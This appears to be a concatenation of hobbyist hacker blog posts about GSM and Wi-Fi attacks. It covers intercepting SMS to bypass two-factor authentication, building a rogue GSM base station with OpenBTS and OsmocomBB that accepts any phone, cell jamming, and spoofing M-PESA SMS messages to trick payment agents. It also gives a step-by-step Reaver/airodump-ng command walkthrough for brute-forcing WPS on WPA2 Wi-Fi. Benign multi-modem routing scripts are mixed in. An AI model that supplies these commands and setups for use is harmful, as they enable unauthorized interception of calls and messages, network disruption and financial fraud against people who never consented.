POC bypassing 2FA (2 Factor Authentication)

one thing i love about trying to secure systems is that people forget "you are as strong as your weakest link"


Today, we hack a system that has 2FA this where as an example to googles gmail, you would sign in using your password, then to put enough secure activity you would have another token required such as a code sent t your phone via SMS.


Pretty secure huh? not really.... it still can be broken, of course many people would start by assuming we will be stealing a phone by the end of this write up but the truth of the matter is, I wont need to touch your phone, so here we go.

The setup:

first we would have the users password (am not willing to engage in this as many a tutorials already exist to try and achieve this , from phishing to down right plain brute force)

second we would obviously require the SMS token sent to the user (hint: this tutorial is about that)
I will break this down to 2 parts, the explanation only then the POC .

EXPLANATION

we will be intercepting the SMS by attacking the um (air) interface between the victims mobile phone and the BTS (Base transmission station)

why does this work and what might be a solution/remediation to it.
1. I have covered this topic before but am going to explain. GSM is a broken technology (so far if you use a CDMA phone you are safe read so far)
2.GSM in most countries use a weak/broken encryption these are either
A5/0 ---- no encryption
A5/1 ---- most commonly used very low encryption and breakable with 2 TB rainbow tables in less than 5-30 minutes on a decent computer
A5/2 ---- much weaker version not commonly used... already  broken
A5/3 --- new version (KASUMI) theoretically broken
3. Phones dont do authentication checking to which BTS they are connected to or if any sniffing* activity is ongoing
4. Non hopping on BTSs allow passive sniffing (explained on part 2)

POC? as usual find it on part two meanwhile google up what those terms that may have eluded you on this piece , as we will indulge even deeper later on.

A hackers Guide to Mac/MacBooks/Mac OS X

Well I remember when i started this blog i kinda wrote an article that had 'fuck macports' somewhere... am sorry, i take that back>> now lets start:

Mac OS --- Unix like (darwin actually from berkley) see image

 , Closed source (for the most part) ,graphical interface even windows questions in supremacy and no i wont do a h/ware review...
So Mac OS X to be specific...

10.7----> love it totally do....
10.8---->just as above love it...
10.9----> owww what have we here? blot? clang no gcc smh!!!! xcode doesnt help as much so what do we do

newbies.... when you want linux* based binaries on your mac and you think theres no package managers like on debian/ubuntu(apt) fedora/centOS(yum)...

think twice ... theres:

• HomeBrew (very clean ..but thats it... clean) uses ruby and git to work its package magic and amazingly .... its very easy to re-write and write its rules (ruby ease and power)
• Fink (so far... not really wanting to call it problem...but it is) this is basically an apt manager honestly it has everything ubuntu/debian packages would do... repositories however have been a bitch to me :(
• MacPorts (so far... loving it) now this is a package manager... clean, stable... well it lacks a few binaries but hey nothings perfect... cant really complain :) 

but first you need XCode to install this (its pretty huge btw) and it has all developers tools from make to clang(replacing gcc(g++)) [i had to install gcc49 from homebrew to facilitate a better compilation clang sucks]

anyway once you done doing that heres the fun bit... install the necessary tools... for me:

hacking tools:
nmap
hydra
john the ripper
reaver
metasploit3
wireshark
p0f
yerssinia*
yarra

...tonnes of them ... for me :) i basically have my own set (actually porting TYPHON here) if it works you will know aight

Evil Twin [GSM Style]

Now I have an Evil twin... lol not exactly what you think about me having another like me only evil hell no, in a security sense/point of view.... an evil twin from wikipedia [full article]

Evil twin is a term for a rogue Wi-Fi access point that appears to be a legitimate one offered on the premises, but actually has been set up to eavesdrop on wireless communications.^[1]

An evil twin is the wireless version of the phishing scam. An attacker fools wireless users into connecting a laptop or mobile phone to a tainted hotspot by posing as a legitimate provider.

This type of evil twin attack may be used to steal the passwords of unsuspecting users by either snooping the communication link or by phishing, which involves setting up a fraudulent web site and luring people there.^[2]

works as above , now i actually saw a demo of this at AfricaHackOn (first information security conference in Africa) on the 28th of february 2014, where a hacker named Casper and D3crapt did the demo on stage to fake wi-fi connections and did a a major MITM attack on unsuspecting people, now with this knowledge, i found it quite interesting and i wanted to take this a notch further, and you know what :) .... I succeeded, now what i wanted to do, was simply achieve the same attack but not on a small scale factor as WIFI no... a bigger scale say GSM(SMS/VOICE/DATA/Mobile-Payment platform) [the whole 9 yards]

Did I make it? now i know thats the main question but lets look at MITM (Man In The Middle attack)

[full article]

The man-in-the-middle attack (often abbreviated MITM, MitM, MIM, MiM, MITMA) in cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker. The attacker must be able to intercept all messages going between the two victims and inject new ones, which is straightforward in many circumstances (for example, an attacker within reception range of an unencrypted Wi-Fi wireless access point, can insert himself as a man-in-the-middle).^{[citation needed]}

Now with this given info we know what attack we are carrying out as Evil Twin really relies on MITM and most of all we do want data right? and all variables check out right?

lets see:

• GSM: relies heavily on the same concept as wi-fi no actually wi-fi relies heavily on the same structure GSM was/is created on so if it works for wi-fi ...might work for GSM.
• GSM: (for a successful MITM [A man-in-the-middle attack can succeed only when the attacker can impersonate each endpoint to the satisfaction of the other — it is an attack on mutual authentication (or lack thereof).]
• Evil Twin (create a fake Broadcast channel/transmission unit)
• MITM capture sessions, Data and even encryption methods

Now.... what works ... well long story short, everything alas.... 

Now Materials, 

Hardware .... in the case of Wi-Fi, Routers(broadcast station) in case of GSM ,SDR (software defined radios)

Now heres a tricky bit which i will throw in tonnes of comparison, now for SDRs we have

• USRP---> Expensive (i kid you not) around 2500USD for a full good set ... after that it has enough documentation to set up, run, configure, tweak, create applications (so easy after purchasing it)has been ported to nearly every single platform out there (mac,linux and windows)
• RTL/SDR---> Enters the familiar and easy to configure , cheap affordable RTL this is a DVB/TV usb tuner that will act as an SDR owww trust me its powerful and cheap at 20 USD or less, has a lot of documentation and has been ported to nearly every single platform out there (mac,linux and windows)
• OsmocomBB---> This are specific devices used to run special firmwares that will do wild things on GSM frequency and when i say wild owwww i mean wild from acting as phones (calypso based (Motorola c113,115,139,123) this  phones are ultra cheap) with costs of 20 or less dollars) but the real price to pay is probably the part where you pay for the following.... nearly primitive code (oww its good code but oww you will pay for having a whole read up of how raw GSM works like ave been here for 14 or so months and ave not fully mastered the whole thing yet) , No documentation (ok there is but its new so expect a lot of few faults) in short not the best thing to start of as a noob (sadly[as this is what we will use])
• Now there are other options (sadly i wont recommend them as yet as i am to get my hands on them [talking bout BladeRF HackRF and others])

ok so we have hardware and we have softwares which ave also listed with their hardwares,

what we need to do... i guess now its basically setup > run or what else?

ok we can learn but am already on my second full page scroll and we aint done nothing yet.... setup is easy if you ask me (ok it wasn't when i started but talk to me and i can give you a script to do all that :) alright) moving on....

After the setup, what do we expect :) ...

HAVOC.... ok ok am on sugar... lets relax...

Setup a Fake (evil twin capable of) Intercepting Mobile (Modem [GSM]) /Traffic hence: 

• Location Disclosure (find victims vicinity)
• SMS (uplink) capture (downlink can be done with RTL-SDR
• VOICE (uplink) (same as above)
• DATA (uplink and downlink)
• Mobile-Payment Platform infiltration (yes its possible to hack both agent and client
• Umm yes this is the best i think so far but i wont disclose further details (update sim-card details owww not simple things like contacts only even trivial things like the sim-card apps on it)
• lastly falsify information (spoof) information to our captured assailants :)

So what did we just do there :) everything....

POC? you want it.... find me, buy me a big KFC lunch and i will sort you out, yes knowledge should be paid for with food and maybe an occasional bank account top-up like a donation but hey am #iOut.

Am explaining, don't arrest me, its called consultancy.... and heads up.... am the good guy

Now I really hate doing this.... honestly I do, why ... o one actually brands me as the good guy... it sucks coz am trying to live a good guy life, but good guys dont get the recognition they deserve, anyway....

now todays news

well so a friend of mine asked me how ca someone block/jam a cell(mobile in this case) network....
so many ways....

1. Broadcast Noise
2. Fake a network signal hence intercept and interrupt network
3. Kill Transmission

1. now this is simple... broadcast noise on the same frequency as the mobile network just a little louder than the phones can listen and ...baaam out

2. now i did illustrate all this earlier when i put this post up about creating a fake BTS.....
now people think this is very trivial, surprising thing... it kinda isnt, now here is my cell jammer budget
USRP N210/200 plus a laptop and a very good antennae .... cost 6000 or so USD or in Kenya Shillings about 500,000 KSH....
or since we dont want all that expense.... here we go, 600 USD or in Kenya shillings a laptop and a 2000 KSH phone yes the motorola c118 comes in handy here....

3.Kill transmission ... this is what was said to happen ..i.e the BTS (tower/booster) was disconnected from the power source.

now to expound on no.2
here we go:

since i explained how to make a BTS from cheap materials (a laptop and a 2000ksh (~20USD) phone)
we have the requirements to run the fake network... and with that let phones connect to our Network and they cant access the original network... so what distance can we cove .. from 50m to 6km
and how many BTSs ca we interrupt? well one at a time .... a full LAC is 6 BTSs, so is it possible, VERY possible.

Prevention ... as Chris Paget said "You can absolutely do nothing when someone Jams a cellphone using noise... absolutely nothing"

VX #iOUT

Making sure that data from two modems gets routed via the same channel it came through even when its split over two simultaneously connected modem

Ok so since i have shown a method to get access to the internet with multiple modems , someone asked what about if i need the same data to pass though the same modem (why? incase of a download that shouldnt be stopped/doesnt allow resume support) so... heres a method...

so we come up with names. Let $IF1 be the name of the first interface and $IF2 the name of the second interface. Then  $IP1 be the IP address associated with $IF1 and $IP2 the IP address associated with $IF2. Next, let $P1 be the IP address of the gateway at Provider 1, and $P2 the IP address of the gateway at provider 2. Finally, let $P1_NET be the IP network $P1 is in, and $P2_NET the IP network $P2 is in.

One creates two additional routing tables, say T1 and T2. These are added in /etc/iproute2/rt_tables. Then you set up routing in these tables as follows:

   ip route add $P1_NET dev $IF1 src $IP1 table T1
   ip route add default via $P1 table T1
   ip route add $P2_NET dev $IF2 src $IP2 table T2
   ip route add default via $P2 table T2
 

Nothing spectacular, just build a route to the gateway and build a default route via that gateway, as you would do in the case of a single upstream provider, but put the routes in a separate table per provider. Note that the network route suffices, as it tells you how to find any host in that network, which includes the gateway, as specified above.

Next you set up the main routing table. It is a good idea to route things to the direct neighbour through the interface connected to that neighbour. Note the `src' arguments, they make sure the right outgoing IP address is chosen.

     ip route add $P1_NET dev $IF1 src $IP1
     ip route add $P2_NET dev $IF2 src $IP2
   

Then, your preference for default route:

     ip route add default via $P1
   

Next, you set up the routing rules. These actually choose what routing table to route with. You want to make sure that you route out a given interface if you already have the corresponding source address:

     ip rule add from $IP1 table T1
     ip rule add from $IP2 table T2
   

This set of commands makes sure all answers to traffic coming in on a particular interface get answered from that interface.

NB

: 'If $P0_NET is the local network and $IF0 is its interface, the following additional entries are desirable: ip route add $P0_NET dev $IF0 table T1 ip route add $P2_NET dev $IF2 table T1 ip route add 127.0.0.0/8 dev lo table T1 ip route add $P0_NET dev $IF0 table T2 ip route add $P1_NET dev $IF1 table T2 ip route add 127.0.0.0/8 dev lo table T2 '

Now, this is just the very basic setup. It will work for all processes running on the route itself, and for the local network, if it is masqueraded. If it is not, then you either have IP space from both modems or you are going to want to masquerade to one of the two modems. In both cases you will want to add rules selecting which modems to route out from based on the IP address of the machine in the local network.

Now Before you SUE me.... am helping ...like for real I AM. #ATTACKING MOBILE PAYMENT SYSTEM MiTM+SE

So a while ago i actually stated that attacking mobile payment systems is inevitable.... now i have not suggested i will be doing that though stick around and you might probably learn a thing or two about this.... now here goes nothing.

so the basic structure of a mobile system is pretty simple

for example I use Safaricoms MPESA ... this is their earlier structure (yet to find any major change though)

Ok first of all let it be known ... I am not doing this on Safaricoms MPESA except for the fact:

1.I use MPESA (actually never used any other service)
2.I own an MPESA sim (duuh) hence my test was restricted to only this
3.I am pretty sure this works on other networks (though not tested)

Ok variables....
MPESA on a standard KEYPAD is emulated by the numbers 67372 ..... now i found this out playing with my iPhone (twas a 3G) quite a while ago.... :) see i once tried saving is a contact and the above numbers poped up.... anyway trying to call the number (oww what could go wrong) it reverted to activating my sim-toolkit lol ...suprise .... and there was my first break through .... now how do we exploit this?

Well Man In The Middle is a nice way but how do you MITM someone when you cant clearly send a message without spoofing the sender ID .... THATS IT :) uh huh, so step one .... create a GSM network ... ok that's not so easy? well it is actually... i did it in 3 hours ok to be fair i had hard-coded something close to that in a few months lol ... just had to watch enough youtube videos ... join OpenBTS forum, revisit my DCE classes (digital comp eng) a little of my ADCE also, alot of soldering, ok long story short reused a lot of code and owww ave already posted that here (well thats just like the uM (air) layer only where you have a BTS that controls several phones at once ....

with a few configurations like setting

Control.LUR.OpenRegistration = .*

to allow any phone to connect to the BTS... MITM is more than inevitable ....

now here's the trick that makes all this work.... once you send an SMS to any phone with the numbers 67372 .... the result automatically displays .... MPESA ..pretty nifty huh :)

Now Safaricom has done a goodthing not to allow any SMSs to be sent to the AGENTs phones but hmmmm that's not enough.... they are still normal phones/SIM cards and basically have the IMSI that am sending the message/SMS to.... here is my proof of sending a message to myself (YES MYSELF) that aint ILLEGAL :) and deceiving my SIM its an MPESA message ... here is the screen shot you can see some other transactions below (legit i might add)

and with a little S.E we can craft an SMS and send it to an AGENT and pretend to withdraw the cash .... this is a serious felony right here, I will be contacting Safaricom by the meantime ... if you don't hear from me... well... take a wild guess :)

VX #iOut

(oww not only safaricom) also other telcos will be notified as my niece says BAI (bye)

TYPHON

I always go into hiding when things are in a knot... currently i have had some good news....

a new gsm hacking tool by VX is out... VX has been on this path for a while trying to come up with a good remedy to sort* all the newbies and experts in the gsm field (read RF)

what it do :) .....

So on a basic stand off in the field of hacking(read pen-test and vulnerability assessments) alot of the procedure goes like...

well you get the picture... so what we will do is debug entire scenarios of GSM in the same format...

• we do recon of the area, networks, Base Stations (call them boosters if you like but am not saying its correct) and also rogue base stations (come on you wanna know when someone listening to you right?)
• Scan the area (now this and step one basically have the same ideology here but other methods can be employed on step one that have a different point of operation from step two)
• Gain access --- rather gain access to certain channels + frequencies (read ARFCN * (BTS in a very big nutshell))
• Maintain access ... (this simply means camp(SYNC) to that BTS (ARFCN)  and now isten very well to the SMS/voice/Data .... see we good righ?
• we add our own step here .... crack the encryption (if any used)
• Cover tracks (well till now i have yet to find any tracks to be covered so just run when you are done owkaeeey?

So this tool --- TYPHON who should be credited...

alot of people.... lets start with:

The FIRMWARE guys (Osmocombb)

Most of the scripts (BRMLAB)

The Guy who created it all and maintains it (VX)

well then how does it work?

>>  basic explanation .... connect a GSM hardware to your computer to be able to debug the air interface (communication between the BTS and the MS) sort of the hardware acts as an ethernet card to our PC and Software... here comes in OsmocomBB (Open source mobile communications BaseBand) this is a stack running on your calypso based device (support for other may be added later on) e.g Motorola C115,118,123 (get all of them here) and interfaces to your laptop, this allows fluid communication and allows studying whats happening in the air interface.

and thats the most basic principle....

with this we can do alot of things as stated above... which the full details will be published as soon as the tool is released. thank you :)

so check the links out and also Follow @taeCode0h on twitter for more info and when he will release the tool.

That Wi-Fi (zero dictionary and obviously its WPA/2)

So first of all i hardly do this (lies) but as a request from a friend here we go:

So you want to attack a WPA2/WPA based wifi? lool ok, i will let you go ahead ...its not easy actually not a directly known attack exists, WEP on the other hand ahem too easy, anyway here is the funny bit, sit back relax and lets do one of the simplest way.

Tools>>Prerequisite:
Backtrack 5R3 ---- Kali Linux
Reaver

(if you on a debian based system do a quick install by)


apt-get update
apt-get install reaver

done

now how reaver works..... (yes the boring details --- ihate making script-kiddies worst i hate noobs who wont try and find out what is happening) so here is the source and link to how it works... alright? we are going to be attacking [Wifi Protected Setup (WPS)] via brute force.

so ahem.

open terminal (no stop asking me about the GUI--- you wanna hack at least learn the terminal)

ok: on terminal do :) ___

iwconfig
 listing the wireless interfaces available
 mine is wlan0

airmon-ng
checks monitor status

airmon-ng stop [your interface] [My is wlan0]
stop monitor status

airodump-ng [your interface] [My is wlan0]
packet capturing

Open new terminal:
wash -i [your interface] [My is wlan0] -c CHANNEL_NUM -C -s
this checks if the WiFi we are attacking is WPS enabled

Open new terminal:
reaver -i [your interface] [My is wlan0] -b [BSSID] --fail-wait=360
and finally FATALITY :)

if all plays according to plan ... you may win 97.2% of the times i go through... if not ahem more sophisticated attacks exist.

oww and yes sometimes some applications like network manager affect the result, so kill 'em before starting and sometimes they don, tools depend on your configuration so stop asking me if they worked on my side THEY DID . :) 

VX out

OK .... (oh am gonna pay for this i know)

Now stop asking me for free internet, i mean for real, is it so hard to think as a hacker? come on, you want something... you make it happen right... after my last post on how to get free internet people have always asked how do i save myself from the issue of the modem disconnecting after 10 minutes or so.... (applies to CDMA only)

Now heres a good hack:

• use a dialer that supports auto/re-connect pppd and wvdial are my best dialers since i am a *nix till i die so...
• create a bash/batch script calling reconnect 
• use a fully connected system.... multiple modems
• use a fully connected system.... multiple modems that interchange after one disconnects to pick the other up,
• use a fully connected system.... multiple modems that interchange after one disconnects to pick the other up and changes the data/traffic route
• use a fully connected system.... multiple modems that interchange after one disconnects to pick the other up and changes the data route and also allows the data/traffic to be persistent on a specific device/modem....

We good? alright

I will show the following methods.

• Bash script to check what modem/device has highest speed(read connected)
• after that change route to currently connected modem (read highest speed)
• finally make sure the above connections can be used e.g to stream a video (very difficult...but not impossible)

Script:

as i said, i use wvdial alot so .... calling to modems with wvdial

 sudo wvdialconf
[sudo] password for taecode0h: 
Editing `/etc/wvdial.conf'.

Scanning your serial ports for a modem.

Modem Port Scan<*1>: S0   S1   S2   S3   
ttyACM0<*1>: ATQ0 V1 E1 -- failed with 2400 baud, next try: 9600 baud
ttyACM0<*1>: ATQ0 V1 E1 -- failed with 9600 baud, next try: 115200 baud
ttyACM0<*1>: ATQ0 V1 E1 -- and failed too at 115200, giving up.


Sorry, no modem was detected!  Is it in use by another program?
Did you configure it properly with setserial?

Please read the FAQ at http://alumnit.ca/wiki/?WvDial

this command checks for the modem on the system then after that writes it to the config fie that is /etc/wvdial.conf

now we can replicate the same config file as we will use the same settings as both modems are of the same company, with that said we will also be required to use a different serial port for the second modem depending on what it finds: .....

 taecode0h@r41nsec:~$ sudo wvdialconf
Editing `/etc/wvdial.conf'.

Scanning your serial ports for a modem.

Modem Port Scan<*1>: S0   S1   S2   S3   
ttyACM0<*1>: ATQ0 V1 E1 -- OK
ttyACM0<*1>: ATQ0 V1 E1 Z -- OK
ttyACM0<*1>: ATQ0 V1 E1 S0=0 -- OK
ttyACM0<*1>: ATQ0 V1 E1 S0=0 &C1 -- OK
ttyACM0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 -- OK
ttyACM0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
ttyACM0<*1>: Modem Identifier: ATI -- MF192-T-1.0.0
ttyACM0<*1>: Speed 4800: AT -- OK
ttyACM0<*1>: Speed 9600: AT -- OK
ttyACM0<*1>: Speed 19200: AT -- OK
ttyACM0<*1>: Speed 38400: AT -- OK
ttyACM0<*1>: Speed 57600: AT -- OK
ttyACM0<*1>: Speed 115200: AT -- OK
ttyACM0<*1>: Speed 230400: AT -- OK
ttyACM0<*1>: Speed 460800: AT -- OK
ttyACM0<*1>: Max speed is 460800; that should be safe.
ttyACM0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
ttyACM1<*1>: ATQ0 V1 E1 -- OK
ttyACM1<*1>: ATQ0 V1 E1 Z -- OK
ttyACM1<*1>: ATQ0 V1 E1 S0=0 -- OK
ttyACM1<*1>: ATQ0 V1 E1 S0=0 &C1 -- OK
ttyACM1<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 -- OK
ttyACM1<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
ttyACM1<*1>: Modem Identifier: ATI -- MF192-T-1.0.0
ttyACM1<*1>: Speed 4800: AT -- OK
ttyACM1<*1>: Speed 9600: AT -- OK
ttyACM1<*1>: Speed 19200: AT -- OK
ttyACM1<*1>: Speed 38400: AT -- OK
ttyACM1<*1>: Speed 57600: AT -- OK
ttyACM1<*1>: Speed 115200: AT -- OK
ttyACM1<*1>: Speed 230400: AT -- OK
ttyACM1<*1>: Speed 460800: AT -- OK
ttyACM1<*1>: Max speed is 460800; that should be safe.
ttyACM1<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
ttyACM2<*1>: ATQ0 V1 E1 -- OK
ttyACM2<*1>: ATQ0 V1 E1 Z -- OK
ttyACM2<*1>: ATQ0 V1 E1 S0=0 -- OK
ttyACM2<*1>: ATQ0 V1 E1 S0=0 &C1 -- OK
ttyACM2<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 -- OK
ttyACM2<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
ttyACM2<*1>: Modem Identifier: ATI -- MF192-T-1.0.0
ttyACM2<*1>: Speed 4800: AT -- OK
ttyACM2<*1>: Speed 9600: AT -- OK
ttyACM2<*1>: Speed 19200: AT -- OK
ttyACM2<*1>: Speed 38400: AT -- OK
ttyACM2<*1>: Speed 57600: AT -- OK
ttyACM2<*1>: Speed 115200: AT -- OK
ttyACM2<*1>: Speed 230400: AT -- OK
ttyACM2<*1>: Speed 460800: AT -- OK
ttyACM2<*1>: Max speed is 460800; that should be safe.
ttyACM2<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
ttyUSB0<*1>: ATQ0 V1 E1 -- OK
ttyUSB0<*1>: ATQ0 V1 E1 Z -- OK
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 -- OK
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 &C1 -- OK
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 -- OK
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
ttyUSB0<*1>: Modem Identifier: ATI -- Manufacturer: +GMI: HUAWEI TECHNOLOGIES CO., LTD
ttyUSB0<*1>: Speed 9600: AT -- OK
ttyUSB0<*1>: Max speed is 9600; that should be safe.
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
ttyUSB1<*1>: ATQ0 V1 E1 -- failed with 2400 baud, next try: 9600 baud
ttyUSB1<*1>: ATQ0 V1 E1 -- failed with 9600 baud, next try: 9600 baud
ttyUSB1<*1>: ATQ0 V1 E1 -- and failed too at 115200, giving up.
ttyUSB2<*1>: ATQ0 V1 E1 -- OK
ttyUSB2<*1>: ATQ0 V1 E1 Z -- OK
ttyUSB2<*1>: ATQ0 V1 E1 S0=0 -- OK
ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 -- OK
ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 -- OK
ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
ttyUSB2<*1>: Modem Identifier: ATI -- Manufacturer: +GMI: HUAWEI TECHNOLOGIES CO., LTD
ttyUSB2<*1>: Speed 9600: AT -- OK
ttyUSB2<*1>: Max speed is 9600; that should be safe.
ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK

Found an USB modem on /dev/ttyACM0.
Modem configuration written to /etc/wvdial.conf.
ttyACM0<Info>: Speed 460800; init "ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0"
ttyACM1<Info>: Speed 460800; init "ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0"
ttyACM2<Info>: Speed 460800; init "ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0"
ttyUSB0<Info>: Speed 9600; init "ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0"
ttyUSB2<Info>: Speed 9600; init "ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0"

As you can see it did find two modems .... forget the part u see the mf-192 its a GSM type i was using to illustrate this, again it only shows one was found but clearly two have according to the terminal one one ttyUSB0 and on ttyACM0 with that said...

leego... save another config file /etc/wvdial2.conf edit the required parts and finally set it out to roll,

now the script.

modem_route=$(
for iface in `ifconfig -a | grep ppp | awk '{print $1; }'`; do
    echo $iface = `ping -I $iface -c 1 -q 8.8.8.8 | grep avg | awk -F/ '{print $5;}'`
done | sort -k 3 -rn | head -n 1
)

logger "Setting new route from candidate: $modem_route"

ip route del default
ip route add default dev `echo $modem_route | awk '{print $1;}'`

now this pings google dns server to check speed and also disconnection depending on the ping TTL and also changes the route between the two modem routes as you can see on the last two lines.

now next thing is to dial both modems.... this is done with the following command 

sudo wvdial -C /etc/wvdial.conf

calls first^ modem 

sudo wvdial -C /etc/wvdial2.conf

calls second^ modem

oww run a cron job to call the script every- i dont know people say cron jobs cant run every second but hey... people also say hacking is hard :) 

with that said...  more configurations can be done to induct a smoother flow on the internet like streaming media and also on allowing media required to pass on a specific device to be as such unchanged :)

do i need to go deeper than this sure... but come on should i do all this for you?

if yes ... wait for it... THIS IS FOR EDUCATIONAL PURPOSES ONLY how to configure routes.


sorta looks like this now huh

                                                                ________
                                          +------------+        /
                                          |            |       |
                            +-------------+ Modem 1 +-------
        __                  |             |            |     /
    ___/  \_         +------+-------+     +------------+    |
  _/        \__      |     if1      |                      /
 /             \     |              |                      |
|YoBox          -----+ Script       |                      |Internet
 \_           __/    |              |                      |
   \__     __/       |     if2      |                      \
      \___/          +------+-------+     +------------+    |
                            |             |            |     \
                            +-------------+ Modem 2 +-------
                                          |            |       |
                                          +------------+        \________

OsmocomBB+OpenBTS+GSM={Calypso Chipset/Motorola C123} *USB+2.5mm Jack

BTS------------Base Transiever Station
GSM-----------Global System for Mobile Communications, originally Group Spécial Mobile
OsmocomBB---Firmware to run in our Calypso Based Device (Motorola C123)
USB to 2.5mm Jack cable (I will show you how to make this)

• What I am doing.
• What are my objectives.
• Why the above equipment.
• Why am I doing this.
• What do I get out of this.

What I am doing

I will be creating a BTS with the cheapest hardware equipment available to do this.

What are my objectives

Read above and then think of what a BTS can do.

Why the above Equipment

• Ummmm coz its really cheap (the equipment)
• Coz I want a BTS really bad (the things you can exploit research with this)
• Coz testing IPV4/IPV6/TCP..... is too overrated and and everyone is doing it... who will do GSM

Why am I doing this (now am just repeating myself)

What do I get out of this

Everything and Nothing ----> yes its every bit of knowledge till where i stop and its nothing since I know Telcos will probably ignore my rant :(

..... ok lets get rolling.

REQUIREMENTS:
Hardware: 

1. PC
2. Calypso Chipset Supported Device (Motorola c113,c115,118.....)
3. USB to 2.5mm Jack cable

Software:

1. *nix Based OS
2. OsmocomBB
3. OpenBTS

STEPS

1. Install OpenBTS (and Asterisk)
2. Install OsmocomBB
3. Configure Everything
4. Create USB -2.5 mm Jack* am not going to go into this.... its a pain i dont want to remember  (not that its very hard ... its just i burnt a finger and probably someones house while at it)
5. Test
6. and......play

1. Install OpenBTS (and Asterisk)

Well this has so many ways to do this, from compiling the source and if you have Ubuntu 12.04 (I did this also on  7.3 (wheezy) 64-bit) x86-64 architecture as your OS Debian packages exist to do this , you need also to install this as a first:

autoconf
libtool
libosip2
libortp
libusb-1.0
g++
sqlite3
libsqlite3-dev (sipauthserve only)
libreadline6-dev
libncurses5-dev

sudo apt-get install autoconf libtool libosip2-dev libortp-dev libusb-1.0-0-dev g++ sqlite3 libsqlite3-dev erlang libreadline6-dev libncurses5-dev

Well after that the following downloaded packages need to be installed (N.B the packages you are about to install are specific for UHD ----USRP Hardware Driver---- devices)

sudo dpkg -i a53_1.0-1_amd64.deb

sudo dpkg -i openbts-public_3.2_amd64.deb

sudo dpkg -i smqueue-public_3.2_amd64.deb 

sudo dpkg -i sipauthserve-public_3.2_amd64.deb

Running OpenBTS

(from OpenBTS root)

cd /OpenBTS

sudo ./OpenBTS

You should see something like this..... well if you have your devices connected and configured

system ready
use the OpenBTSCLI utility to access CLI

And if you scan for GSM towers on your phone, you should see a 00101 (test) network. If you try to attach, it will reject you. This is because OpenBTS, by default, only allows registered handsets to connect. As we are not running our registration server (sipauthserve) no phones will camp. From here, we should look at a few OpenBTS configuration variables. Connect to OpenBTS with the OpenBTSCLI command:

(from OpenBTS root) 

cd /OpenBTS 

sudo ./OpenBTSCLI

Once you have OpenBTS up and running, you need to change the following configuration parameters in the database (/etc/OpenBTS/OpenBTS.db):

Control.GSMTAP.TargetIP = 127.0.0.1
GSM.Radio.NeedBSIC = 1
GSM.Radio.Band = 1800
GSM.CellSelection.Neighbors =           (set to empty string)
GSM.RACH.MaxRetrans = 3
GSM.RACH.TxInteger = 8
GSM.Radio.C0 = <your ARFCN (see note)>
Control.LUR.OpenRegistration = ^63905.*$   (note: in this example only IMSIs with MCC 639 and the MNC 05 will be allowed to register to the network, change that accordingly)

Warning: Only set GSM.Radio.C0 to an ARFCN you have a valid license for.

Installing OsmocomBB

this part is really fun but also very tricky especially if you don't have an arm cross compiler (this enables us to compile the arm code to firmwares for the software to be loaded in to the calypso based device read (Motorola C123)

so here is a good place to start :

am guessing you have done the necessary, many people ask me where the usb to 2.5 mm cable is available for purchase and i would say here

now that we have nearly everything done, play around with Osmocom if its your first time.... clearly if you need to know what it does i would suggest you go to my PDFs link and get more info on the 2G networks before doing anything past what you are doing.


Now.... this is how to work a BTS from the cheap device.....

P.S you need to do a filter replacement as such and in-case you destroy your board like i also did you will need to do... this look at photo

"When attempting this for the first try, I soldered / desoldered components a few times and ended up destroying the pads and traces so much that there was no way I could put the original filters or balun back on the PCB.

So in a last attempt to make the phone do something, I tried something a little unorthodox (actually proposed by h0rizon on IRC :). Instead of doing a proper unbalanced to balanced signal convesion, I just connected one of the RITA balanced line to the ground using a DC blocking cap. And then connected the other balanced line to the input via a capacitor as well. For DCS1800 you need to add a capacitor of your own, but for EGSM, there is a capacitor in the input SAW matching that does the trick so you only need a wire.

The quite dirty results is shown on the side. It's ugly but it actually works ... The signal is maybe distorded or a litte more noisy, that has yet to be determined. So if you screw up, you can always fall back to this :)

" cited from http://246tnt.com/gsm/rx_filter.html

RF-hacking.... Yes Radio Frequency SPECIFICALLY, GSM

So do I start with explaining every single bit? because this is one hell of a lengthy topic.

OK lets start here:

GSM:
Most common network/protocol in the mobile industry (around 75% of mobile users)
Established around 1999
Very common
(was/is) Very Expensive Debugging devices
(had) Very little Documentation

Equipment:

MS-----------Mobile Station=Mobile Equipment + Sim Card
BTS----------Base Transmission Station
BSC----------Base Station Controller

here is a basic illustration of the GSM network



So with this we have a huge playing field, I know this is rather new to many people and since GSM was a very hushed on project it means the documentation available is either too heavy for people to indulge in or too un-detailed, so starting of from the really simple works out there i will try to bridge this lines the best way i can.

so my next post will explain how to do "DEBUGGING" on this network with very simple easy to afford tools (note afford not get)

Here are the things that we can achieve as of now.

Access the air interface between the phone and BTS
Access HLR via SS7 hacks and pay services (later on)

So what will we learn from all this:

